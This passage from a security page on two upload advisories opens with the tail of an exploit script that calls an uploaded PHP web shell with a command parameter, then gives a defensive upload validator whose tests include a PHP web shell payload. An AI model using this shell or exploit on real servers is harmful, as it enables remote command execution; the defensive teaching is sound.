f'/cms-data/depot/cmssoccerdepot/hey.php?cmd={command}'<br />        shell_url = url + shell_path<br />        print(shell_url)<br />        shell_response = requests.get(shell_url)<br />        print(shell_response.text)<br />    else:<br />        print('Failed to execute the request.')<br /><br /></code></pre>
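Both upload advisories on this page fail the same server-side checks: the File Manager Advanced Shortcode request carries its own `upload_allow=text/x-php` and `upload_max_size` fields, which the server must never honour, and the Total CMS upload is a `.php` file wearing a fake PNG header. The validator below is an added example, not code from either plugin or advisory: it keeps an allowlist of extensions with their magic bytes on the server, reports client-supplied policy fields instead of applying them, checks the declared type against the content, and still rejects a file whose header is right but which embeds a PHP tag. The sample inputs are constructed from the payloads quoted in the two advisories.

```python
import os
import re
import secrets

# Server-side allowlist: extension -> (MIME type, magic bytes). This is the only
# source of truth; nothing in the request may widen it.
ALLOWED = {
    ".png": ("image/png", b"\x89PNG\r\n\x1a\n"),
    ".jpg": ("image/jpeg", b"\xff\xd8\xff"),
    ".jpeg": ("image/jpeg", b"\xff\xd8\xff"),
    ".pdf": ("application/pdf", b"%PDF-"),
}
# Form fields from the File Manager Advanced Shortcode request that only the
# server's own configuration may decide.
SERVER_ONLY_FIELDS = ("upload_allow", "upload_max_size", "operations",
                      "path_type", "hide_path", "enable_trash")
PHP_TAG = re.compile(rb"<\?(?:php|=)|<script[^>]+language\s*=\s*[\"']?php", re.I)

def untrusted_fields(form):
    """Return the server-only fields a client tried to set, for logging only."""
    return sorted(k for k in form if k in SERVER_ONLY_FIELDS)

def validate_upload(filename, content, form=None):
    """Return (accepted, reason). `form` is the client's multipart form data; it
    is consulted only to report tampering, never to decide what is allowed."""
    tampered = untrusted_fields(form or {})
    if os.path.basename(filename) != filename or "\\" in filename or filename.startswith("."):
        return False, "filename contains a path component or is a dotfile"
    stem, ext = os.path.splitext(filename)
    if "." in stem:
        return False, "multiple extensions are not accepted (e.g. shell.php.png)"
    if ext.lower() not in ALLOWED:
        note = f" (client-supplied {tampered} ignored)" if tampered else ""
        return False, f"extension {ext!r} is not in the server allowlist" + note
    mime, magic = ALLOWED[ext.lower()]
    if not content.startswith(magic):
        return False, f"content does not start with the {mime} signature"
    # The Total CMS sample passes the signature check with a fake PNG header,
    # so the body is scanned for PHP tags as well.
    if PHP_TAG.search(content):
        return False, "PHP code embedded in an otherwise valid-looking file"
    return True, f"accepted as {mime}"

def storage_name(filename):
    """Random on-disk name with the validated extension, so the original name
    (and any guessable URL to it) is never reused. Store it outside the web root
    or in a directory where the server does not execute scripts."""
    return secrets.token_hex(16) + os.path.splitext(filename)[1].lower()

if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16 + b"IEND"
    print(validate_upload("logo.png", png, {"cmd": "upload"}))
    print(validate_upload("exploit2.php", b"<?php system($_GET['cmd']);?>",
                          {"upload_allow": "text/x-php", "upload_max_size": "2G"}))
    print(validate_upload("hey.png", b"\x89PNG\r\n\x1a\n...<?php echo 1; ?>IEND"))
```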